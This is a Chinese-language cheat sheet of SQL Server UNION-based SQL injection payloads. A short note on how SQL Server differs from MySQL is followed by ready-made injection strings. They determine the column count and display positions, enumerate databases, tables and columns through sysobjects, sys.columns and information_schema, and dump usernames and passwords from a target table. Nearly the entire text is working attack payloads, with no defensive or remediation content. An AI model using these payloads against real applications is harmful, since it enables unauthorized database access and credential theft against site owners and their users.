sqlserver联合注入
联合注入
介绍
SQLServer 的联合注入和 MySQL 的区别很大。
特点
SQL Server 是强类型的数据库,判断回显位时先用 null 占位,再依次用字符串替换
SQL Server 中没有 LIMIT 语句,可以用 TOP 代替,或者使用 STRING_AGG(SQL Server 2017 新增)
SQL Server 没有 group_concat() 函数,想要一次性获取多行数据,可以使用 FOR XML PATH 或 FOR JSON AUTO
常用语句
判断列数
order by 4--+
找回显位
union select '1',null,null,null --+ 
union all select '1',null,null,null --+ 
查当前数据库名
union select null,db_name(),null,null--+ 
获取全部数据库名
union select null,(select top 1 name from master..sysdatabases for xml path),null,null--+ 
union select null,(select top 1 name from sys.databases),null,null--+ 
查表名
union select null,(select top 1 table_name from information_schema.tables WHERE table_type = 'BASE TABLE'),null,null --+ 
union select null,(select top 1 name from sysobjects where xtype='u'),null,null--+ 
union select null,(select top 1 name from sysobjects where xtype='u' and name not in ('第一个表名')),null,null--+ 
union select null,(select top 1 name from 数据库名.dbo.sysobjects where xtype='u'),null,null--+ 
union select null,(select top 1 name from 数据库名.dbo.sysobjects where xtype='u' and name not in ('第一个表名')),null,null--+ 
union select null,(select top 1 name from sys.objects where type='u'),null,null--+ 
获取全部表名
union select null,(select table_name from information_schema.tables WHERE table_type = 'BASE TABLE' for xml path),null,null --+ 
union select null,(select name from sysobjects where xtype='u' for xml path),null,null--+ 
union select null,(select name from 数据库名.dbo.sysobjects where xtype='u' for xml path),null,null--+ 
union select null,(select name from sys.objects where type='u' for xml path),null,null--+ 
查列名
union select null,(select top 1 column_name from information_schema.columns where table_name='表名'),null,null--+ 
union select null,(select top 1 col_name(object_id('表名'),1)),null,null--+ union select null,(select top 1 col_name(object_id('表名'),第几列)),null,null--+ 
union select null,(select top 1 name from syscolumns where id=object_id('表名')),null,null--+ 
union select null,(select top 1 name from syscolumns where id=object_id('表名') and name not in (列名)),null,null--+ 
union select null,(select top 1 name from sys.columns where object_id=object_id('表名')),null,null--+ 
查全部列名
union select null,(select column_name from information_schema.columns where table_name='表名' for xml path),null,null--+ 
union select null,(select name from syscolumns where id=object_id('表名') for xml path),null,null--+ 
union select null,(select name from sys.columns where object_id=object_id('表名') for xml path),null,null--+ 
查数据
union select null,(select top 1 concat(username,0x7e,password) from 表名),null,null --+ 
union select null,(select username from 表名 for xml path),null,null --+
 
                     
                    
                 
                    
                
 
                
            
         